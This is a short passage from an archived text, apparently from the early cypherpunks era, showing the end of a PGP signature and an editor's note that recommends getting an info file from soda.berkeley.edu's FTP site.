iQCVAgUBLAulOYOA7OpLWtYzAQHLfQP/XDSipOUPctZnqjjTq7+665MWgysE1ex9
lh3Umzk2Q647KyqhoCo8f7nVrieAZxK0HjRFrRQnQCwjTSQrve2eAQ1A5PmJjyiI
Y55E3YIXYmKrQekIHUKaMyATfnhNc6+2MT8mwaWz2kiOTRkun/SlNI3Cv3Qt8Emy
Y6Zv0kk/7rs=
=simY
-----END PGP SIGNATURE-----

[Editor:  We suggest that everyone go ahead and get the info file from
          soda.berkeley.edu's ftp site.  While you are there,
          take a look around.  Lots of groovy free stuff.]
 

AOH Site layout & design copyright © 2006 AOH